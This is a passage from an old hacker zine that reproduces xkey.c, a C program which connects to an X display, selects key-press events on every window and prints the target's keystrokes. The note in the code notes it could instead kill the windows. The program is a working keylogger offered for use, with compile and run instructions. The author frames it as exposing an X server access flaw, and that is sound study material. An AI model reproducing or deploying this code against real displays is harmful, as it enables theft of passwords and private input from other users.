UNIX (X11) - Xserver hole - Get keypresses from other xterms
:
<xkey.c source follows>
---------------------------------CUT HERE------------------------------------
/* To compile, run it through your favorite ansi compiler something like
* this :
*
* gcc -o xkey xkey.c -lX11 -lm
*
* To run it, just use it like this : xkey displayname:0
* and watch as that display's keypresses show up in your shell window.
*
* Dominic Giampaolo (nick@cs.maxine.wpi.edu)
*/
#include <stdio.h>
#include <X11/X.h>
#include <X11/Xlib.h>
#include <X11/Intrinsic.h>
#include <X11/StringDefs.h>
#include <X11/Xutil.h>
#include <X11/Shell.h>
char *TranslateKeyCode(XEvent *ev);
Display *d;
void snoop_all_windows(Window root, unsigned long type)
{
static int level = 0;
Window parent, *children, *child2;
unsigned int nchildren;
int stat, i,j,k;
level++;
stat = XQueryTree(d, root, &root, &parent, &children, &nchildren);
if (stat == FALSE)
{
fprintf(stderr, "Can't query window tree...\n");
return;
}
if (nchildren == 0)
return;
/* For a more drastic inidication of the problem being exploited
* here, you can change these calls to XSelectInput() to something
* like XClearWindow(d, children[i]) or if you want to be real
* nasty, do XKillWindow(d, children[i]). Of course if you do that,
* then you'll want to remove the loop in main().
*
* The whole point of this exercise being that I shouldn't be
* allowed to manipulate resources which do not belong to me.
*/
XSelectInput(d, root, type);
for(i=0; i < nchildren; i++)
{
XSelectInput(d, children[i], type);
snoop_all_windows(children[i], type);
}
XFree((char *)children);
}
void main(int argc, char **argv)
{
char *hostname;
char *string;
XEvent xev;
int count = 0;
if (argv[1] == NULL)
hostname = ":0";
else
hostname = argv[1];
d = XOpenDisplay(hostname);
if (d == NULL)
{
fprintf(stderr, "Blah, can't open display: %s\n", hostname);
exit(10);
}
snoop_all_windows(DefaultRootWindow(d), KeyPressMask);
while(1)
{
XNextEvent(d, &xev);
string = TranslateKeyCode(&xev);
if (string == NULL)
continue;
if (*string == '\r')
printf("\n");
else if (strlen(string) == 1)
printf("%s", string);
else
printf("<<%s>>", string);
fflush(stdout);
}
}
#define KEY_BUFF_SIZE 256
static char key_buff[KEY_BUFF_SIZE];
char *TranslateKeyCode(XEvent *ev)
{
int count;
char *tmp;
KeySym ks;
if (ev)
{
count = XLookupString((XKeyEvent *)ev, key_buff, KEY_BUFF_SIZE, &ks,NULL);
key_buff[count] = '\0';
if (count == 0)
{
tmp = XKeysymToString(ks);
if (tmp)
strcpy(key_buff, tmp);
else
strcpy(key_buff, "");
}
return key_buff;
}
else
return NULL;
}
--------------------------------CUT HERE------------------------------------
<instructions included in the first lines of the source>
+++++
NOTE: all Standard Disclaimers (tm) apply. Also, if you DO use the things
found in this file for malicious purposes, please let me know. I'll kick
your ass before they lock you up.
Well, This should be enough to keep you all busy for a few weeks until the
next release. Good luck, and happy hacking.
Ghost in the Machine
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
CLOSING -
Well That concludes Issue 1. It's a bit smaller than I had hoped, But
I'm already working on articles for the next issue, so it will hopefully
be a bit larger and hopefully even better.
Hope you found these files useful, interesting, or at least worth the
time it took to read them.
gitm
